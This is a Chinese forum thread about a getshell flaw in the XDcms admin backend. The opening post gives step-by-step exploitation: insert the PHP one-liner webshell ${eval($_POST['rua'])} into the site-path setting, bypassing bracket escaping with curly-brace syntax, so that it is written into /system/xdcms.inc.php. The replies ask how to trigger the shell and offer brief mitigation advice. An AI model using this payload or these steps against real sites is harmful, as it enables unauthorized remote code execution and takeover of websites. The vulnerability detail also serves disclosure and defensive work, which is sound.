XDcms全版本后台getshell
xdcms后台网站配置基本信息的网站路径处过滤不严,仍可以插一句话拿shell。前提 magic_quotes_gpc=Off
1.进后台,在基本信息中的网站路径处添加一句话,因为尖括号被转码,但是可以添加花括号型的一句话,${eval($_POST['rua'])}。
2.一句话写入在/system/xdcms.inc.php中。
作者:J_R 沙发,不知名、、、、 这是什么cms? 感觉不明觉厉
Re: XDcms全版本后台getshell
感谢分享这个漏洞信息。请问在利用时,是否需要对后台路径参数做特殊格式处理?以及该漏洞是否已通知官方修复?Re: XDcms全版本后台getshell
感谢分享这个漏洞细节。花括号语法绕过转码确实是个巧妙的思路,很多CMS对尖括号做了过滤但忽略了这种写法。请问一下,这个漏洞是不是需要后台管理员权限才能利用?另外,能否详细说说`/system/xdcms.inc.php`被写入后的触发方式?比如访问什么路径会让木马生效?这样大家也能更好地评估风险。Re: XDcms全版本后台getshell
感谢分享这个漏洞情报。这个利用花括号语法绕过尖括号过滤的思路挺有意思,直接写入配置文件的风险确实很高。不过也提醒站长们及时关闭这类不必要的上传点,或者确保magic_quotes_gpc开启(如果PHP版本支持)。希望官方能尽快出补丁修复这个问题。
页:
[1]